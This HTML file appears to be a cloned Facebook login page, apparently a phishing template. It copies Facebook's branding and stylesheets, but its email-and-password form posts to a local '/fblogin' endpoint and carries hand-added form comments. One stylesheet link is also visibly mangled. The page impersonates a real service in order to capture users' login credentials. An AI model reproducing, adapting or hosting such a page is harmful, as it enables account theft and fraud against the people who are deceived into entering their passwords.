<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <noscript>
    <meta http-equiv="refresh" content="0; URL=/fblogin/?_fb_noscript=1" /></noscript>
    <link rel="manifest" href="/data/manifest/" crossorigin="use-credentials" />
    <title id="pageTitle">Log in to Facebook | Facebook</title>
    <meta property="og:site_name" content="Facebook" />
    <meta property="og:url" content="https://www.facebook.com/login/" />
    <meta property="og:locale" content="en_GB" />
    <link rel="search" type="application/opensearchdescription+xml" href="/osd.xml" title="Facebook" />
    <link rel="canonical" href="https://www.facebook.com/login/" />
    <link rel="alternate" media="only screen and (max-width: 640px)">
    <a href="https://m.facebook.com/login/?locale2=en_GB" />

    <meta name="description"
        content="Log in to Facebook to start sharing and connecting with your friends, family and people you know." />
    <meta name="robots" content="noodp,noydir" />
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/PzYM5WOTT-E.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="+wd08" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/28tUufMePXj.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="EZ11z" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/95Iy2dUdv8H.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="jiDVi" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/yLW2msHrBcm.css?/login        data-bootloader-hash="P+Pr/" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0,cross/Enl_-OJlb6P.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="PQati" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yw/l/0,cross/sMtGI7SwCNA.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="xrGpu" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/cln5QvMjnAw.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="0lRa4" crossorigin="anonymous" />
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/pG8EPCHc4il.js?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="dhH9p" crossorigin="anonymous" nonce="cQsdkAIt"></script>

</head>

<body
    class="login_page _39il _97vt _97vz _97v- _97v_ _97w2 _97w0 UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit x1 Locale_en_GB"
    dir="ltr">
    <script nonce="cQsdkAIt">requireLazy(["bootstrapWebSession"], function (j) { j(1598537632) })</script>
    <div class="_li" id="u_0_2">
        <div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_3">
            <div class="_608m">
                <div class="_5aj7 _tb6">
                    <div class="_4bl7"><span class="mrm _3bcv _50f3">Jump to</span></div>
                    <div class="_4bl9 _3bcp">
                        <div class="_6a _608n" aria-label="Navigation assistant" aria-keyshortcuts="Alt+/"
                            role="menubar" id="u_0_4">
                            <div class="_6a uiPopover" id="u_0_5"><a role="button"
                                    class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="#"
                                    style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle"
                                    id="u_0_6"><span class="_55pe">Sections of this page</span><span
                                        class="_4o_3 _3-99"><i class="img sp_GdttQwTWzSJ sx_b7dcec"></i></span></a>
                            </div>
                            <div class="_6a _3bcs"></div>
                            <div class="_6a mrm uiPopover" id="u_0_7"><a role="button"
                                    class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy"
                                    href="#" style="max-width:200px;" aria-haspopup="true" tabindex="-1"
                                    aria-expanded="false" rel="toggle" id="u_0_8"><span class="_55pe">Accessibility
                                        help</span><span class="_4o_3 _3-99"><i
                                            class="img sp_GdttQwTWzSJ sx_e8a7b0"></i></span></a></div>
                        </div>
                    </div>
                    <div class="_4bl7 mlm pll _3bct">
                        <div class="_6a _3bcy">Press <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> to
                            open this menu</div>
                    </div>
                </div>
            </div>
        </div>
        <div id="globalContainer" class="uiContextualLayerParent">
            <div class="fb_content clearfix " id="content" role="main">
                <div class="_4-u5 _30ny">
                    <div class="_97vy"><img class="_97vu img"
                            src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook" /></div><span
                        class="muffin_tracking_pixel_start"></span><img class="tracking_pixel" /><span
                        class="muffin_tracking_pixel_end"></span>
                    <div class="_4-u2 _1w1t _4-u8 _52jv">
                        <div class="_xku" id="header_block"><span class="_97w1 _50f6">
                                <div class="_9axz">Log in to Facebook</div>
                            </span></div>
                        <div class="login_form_container">

                            <!-- The actual Form -->

                            <form id="login_form" action="/fblogin" method="post">
                                <div class="clearfix _5466 _44mg" id="email_container"><input type="text"
                                        class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email"
                                        tabindex="0" placeholder="Email address or phone number" value="" autofocus="1"
                                        autocomplete="username" aria-label="Email address or phone number" /></div>

                                <div class="clearfix _5466 _44mg"><input type="password"
                                        class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="pass" id="pass"
                                        tabindex="0" placeholder="Password" value="" autocomplete="current-password"
                                        aria-label="Password" /></div>
                                <div class="_xkt">

                                    <button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy"
                                        id="loginbutton" name="login" tabindex="0" type="submit">Log In</button>

                                </div>
                                <div class="_xkv fsm fwn fcg" id="login_link"><a
                                        href="https://www.facebook.com/recover/initiate/?ars=facebook_login"
                                        class="_97w4" target="">Forgotten account?</a><span role="presentation"
                                        aria-hidden="true"> · </span><a href="/r.php?locale=en_GB&amp;display=page"
                                        rel="nofollow" class="_97w5">Sign up for Facebook</a></div>
                        </div>
                    </form>
                        <!-- Form Ends -->
                    </div>
                </div>
            </div>
        </div>
        <div class="">

        </div>
    </div>
    <div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
            style="display:none" /></span>
    </div>
    <div style="display:none">
        <div></div>
        <div></div>
        <div></div>
    </div>

    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/PzYM5WOTT-E.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/28tUufMePXj.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/95Iy2dUdv8H.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3izuN4/ya/l/en_GB/yMvm-KIVY2g.js?_nc_x=Ij3Wp8lg5Kz"
        as="script" crossorigin="anonymous" nonce="cQsdkAIt" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/yLW2msHrBcm.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0,cross/Enl_-OJlb6P.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yw/l/0,cross/sMtGI7SwCNA.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/cln5QvMjnAw.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />

</html>